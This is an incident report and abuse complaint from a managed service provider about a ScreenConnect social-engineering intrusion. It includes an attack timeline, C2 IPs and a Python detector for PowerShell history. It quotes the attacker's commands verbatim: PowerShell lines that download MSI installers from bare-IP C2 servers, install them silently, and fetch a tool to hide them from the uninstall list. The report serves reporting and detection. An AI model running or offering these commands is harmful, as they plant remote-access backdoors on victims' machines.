- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya)
- C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset
- IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise
- Conditional Access policies deployed (MFA, block foreign, block legacy auth)
- 38 stale test station accounts deleted from Entra
- Test datasheet pipeline investigated - data exists in DB, export step broken
- TestDataSheetUploader source code extracted for analysis

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Subject: Abuse Report - ScreenConnect Cloud Instance Used for Unauthorized Access and C2 Deployment
Dear ConnectWise Security/Abuse Team,
We are reporting a ScreenConnect cloud instance being used to conduct unauthorized access attacks against our client's infrastructure.
Offending ScreenConnect Instance
- Relay hostname: instance-wlb9ga-relay.screenconnect.com
- Operator alias: Angel Raya
- ScreenConnect Client ID: 0cad93610010625f
- Session GUID: 8bb6c85a-6cab-46ab-8cad-26f6d2672a03
- Client Version: 26.1.18.9566
Nature of Abuse
On March 27, 2026, an individual operating under the name "Angel Raya" used the above ScreenConnect cloud instance to gain unauthorized remote access to a victim workstation. Once connected, the operator used the ScreenConnect backstage shell to execute PowerShell commands that:
- Downloaded and silently installed two additional ScreenConnect clients from self-hosted C2 servers (80.76.49.18:8040 and 45.88.91.99:8040, both on AS399486 / Virtuo hosting)
- Downloaded a tool to hide the rogue installations from the Windows uninstall list
- Returned later through the self-hosted C2 backdoor under the session name "Administrator"
Attack Timeline (March 27, 2026)
- 08:28 - ScreenConnect client (0cad93610010625f) installed from C:\Users\jlohr\Downloads\ScreenConnect.ClientSetup.msi
- 08:29 - "Angel Raya" connected via instance-wlb9ga-relay.screenconnect.com
- 08:29 - PowerShell commands executed to install two self-hosted ScreenConnect C2 backdoors
- 08:31 - "Hide From Uninstall List" tool downloaded and extracted
- 08:32 - Tool used to hide rogue ScreenConnect clients from Add/Remove Programs
- 08:32 - "Angel Raya" disconnected
Commands Executed via Backstage Shell
The following commands were found in the PowerShell terminal history on the victim machine:
powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
Invoke-WebRequest -Uri "https://www.sordum.org/files/downloads.php?hide-from-uninstall-list" -OutFile "C:\Users\Public\Pictures\Backup.zip"
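As an added detection example (not part of this report and not ConnectWise tooling), the following Python scans exported PowerShell history lines for the pattern described above: a remote MSI pulled by Invoke-WebRequest from a bare IP on a non-standard port and installed silently, plus the uninstall-list hiding tool. The sample history is constructed from the commands quoted above with one benign line added.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample standing in for a PowerShell ConsoleHost_history.txt:
# the three commands quoted in the report above plus one benign line.
SAMPLE_HISTORY = [
    "powershell -Command \"Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait\"",
    "powershell -Command \"Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait\"",
    'Invoke-WebRequest -Uri "https://www.sordum.org/files/downloads.php?hide-from-uninstall-list" -OutFile "C:\\Users\\Public\\Pictures\\Backup.zip"',
    "Get-ChildItem C:\\Users\\Public\\Pictures",
]

IWR_URI = re.compile(r"Invoke-WebRequest\s+-Uri\s+['\"]?(https?://[^'\"\s]+)", re.I)
SILENT_MSI = re.compile(r"msiexec\b.*?/(?:qn|quiet)\b", re.I)

def is_bare_ip(host):
    """True when the download host is a literal IP rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def scan_history(lines):
    """Return (line_no, url, reasons) for each download line that matches the
    tradecraft in the report; lines without a download are ignored."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = IWR_URI.search(line)
        if not m:
            continue
        url = m.group(1)
        parts = urlsplit(url)
        reasons = []
        if is_bare_ip(parts.hostname or ""):
            reasons.append(f"download from bare IP host {parts.hostname}")
        if parts.port not in (None, 80, 443):
            reasons.append(f"non-standard port {parts.port}")
        if parts.path.lower().endswith(".msi") and SILENT_MSI.search(line):
            reasons.append("MSI fetched and installed silently in one command")
        if "screenconnect" in url.lower():
            reasons.append("ScreenConnect client fetched outside managed deployment")
        if "hide-from-uninstall" in url.lower():
            reasons.append("tool that hides entries from Add/Remove Programs")
        if reasons:
            findings.append((n, url, reasons))
    return findings
```

Run it over an exported history file (one command per line) and review each returned tuple; the benign fourth sample line produces no finding.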
Additional Context
- The victim's Microsoft 365 account also showed successful unauthorized sign-ins from Istanbul, Turkey and Croydon, UK, along with sustained brute-force attempts from Germany and Luxembourg over the preceding week.
- The self-hosted C2 ScreenConnect MSI packages have build dates of April 8, 2025, suggesting this operation has been active for approximately one year.
- The victim was a departing employee (retiring March 31, 2026), which may have been a factor in targeting.
Requested Action
- Identify and suspend the ScreenConnect cloud account associated with instance-wlb9ga-relay.screenconnect.com
- Preserve all session logs, account registration information, and billing details for this instance
- Share any available information with law enforcement upon request
This incident is being reported to the FBI IC3 and the hosting provider (Virtuo / AS399486).
Reporting Organization
Arizona Computer Guru, LLC
Managed Service Provider
Phone: 520-304-8300
Email: support@azcomputerguru.com
Thank you for your prompt response.